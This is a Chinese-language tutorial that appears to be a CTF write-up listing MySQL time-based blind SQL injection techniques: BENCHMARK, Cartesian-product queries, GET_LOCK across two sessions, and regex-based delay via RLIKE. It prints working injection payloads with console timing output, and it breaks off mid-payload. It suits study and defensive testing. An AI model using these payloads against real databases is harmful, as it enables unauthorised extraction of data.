五种时间盲注姿势
- sleep()函数
- benchmark函数
BENCHMARK(count,expr)benchmark函数会重复计算expr表达式count次,所以我们可以尽可能多的增加计算的次数来增加时间延迟,如下:
可以看到通过重复计算延时了1.90s
- 笛卡尔积盲注
注入姿势
mysql> SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C;
+-----------+
| count(*) |
+-----------+
| 113101560 |
+-----------+
1 row in set (2.07 sec)
mysql> select * from ctf_test where user=\'1\' and 1=1 and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C);
+------+-----+
| user | pwd |
+------+-----+
| 1 | 0 |
+------+-----+
1 row in set (2.08 sec)
mysql> select * from ctf_test where user=\'1\' and 1=0 and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.tables C);
Empty set (0.01 sec)
利用and短路运算规则进行时间盲注。
- GET_LOCK盲注
get_lock函数官方文档中的介绍
可以看出文档中写的是我们如果已经开了一个session,对关键字进行了get_lock,那么再开另一个session再次对关键进行get_lock,就会延时我们指定的时间。
此盲注手法有一些限制,就是必须要同时开两个SESSION进行注入
SESSION A
mysql> select get_lock(\'lihuaiqiu\',1);
+-------------------------+
| get_lock(\'lihuaiqiu\',1) |
+-------------------------+
| 1 |
+-------------------------+
1 row in set (0.00 sec)
SESSION B
mysql> select get_lock(\'lihuaiqiu\',5);
+-------------------------+
| get_lock(\'lihuaiqiu\',5) |
+-------------------------+
| 0 |
+-------------------------+
1 row in set (5.00 sec)
mysql> select * from ctf_test where user=\'0\' and 1=1 and get_lock(\'lihuaiqiu\',2);
Empty set (2.00 sec)
mysql> select * from ctf_test where user=\'0\' and 1=0 and get_lock(\'lihuaiqiu\',2);
Empty set (0.00 sec)
同样的盲注利用手法。
- 正则
DOSRLIKE注入
延时原理,利用SQL多次计算正则消耗计算资源产生延时效果,其实原理是和我们的benchmark注入差不多的。
利用手法
mysql> select * from flag where flag=\'1\' and if(mid(user(),1,1)=\'s\',concat(rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\')) RLIKE \'(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b\',1);
+------+
| flag |
+------+
| 1 |
+------+
1 row in set (0.00 sec)
mysql> select * from flag where flag=\'1\' and if(mid(user(),1,1)=\'r\',concat(rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'),rpad(1,999999,\'a\'